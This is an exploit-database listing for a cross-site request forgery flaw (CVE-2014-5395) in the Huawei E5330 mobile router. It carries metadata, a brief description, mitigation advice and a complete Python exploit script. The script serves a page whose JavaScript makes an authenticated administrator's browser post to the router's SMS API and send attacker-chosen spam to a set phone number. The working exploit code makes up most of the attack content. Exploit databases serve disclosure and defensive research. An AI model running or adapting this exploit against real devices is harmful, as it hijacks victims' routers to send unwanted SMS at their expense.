header-logo
Suggest Exploit
vendor:
E5330
by:
Nathu Nandwani
7.5
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: E5330
Affected Version From: 21.210.09.00.158
Affected Version To: 21.210.09.00.158
Patch Exists: YES
Related CWE: CVE-2014-5395
CPE: h:huawei:e5330
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x64
2019

Huawei E5330 Cross-Site Request Forgery (Send SMS)

This exploit allows an attacker to send a malicious SMS to a receiving phone number from a Huawei E5330 router. The administrator who opens the URL should be authenticated. The exploit uses XMLHttpRequest to send a POST request to the router's API with the receiving phone number and the malicious SMS text. The exploit also sets the date of the SMS to the current date and time.

Mitigation:

The administrator should not open any suspicious URLs. The router should be updated to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
# Date: 01/07/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
# Version: 21.210.09.00.158
# Tested on: Windows 10 x64
# CVE: CVE-2014-5395
# Note: The administrator who opens the URL should be authenticated.
import socket
import time
 
server_ip = "0.0.0.0"
server_port = 80
 
huawei_ip = "192.168.8.1"
receiving_phone_no = "01234567890"
sms_text = "This is a SPAM text from Huawei E5330"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
 
print "Currently listening at " + server_ip + ":" + str(server_port)        
 
client, (client_host, client_port) = sock.accept()
 
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
 
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')

client.send("""
<html>
    <body>
        <script>
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
            xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text  + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
        </script>
    </body>
</html>
""")
 
client.close()
sock.close()

Navigation

Suggest Exploit

Services By CQR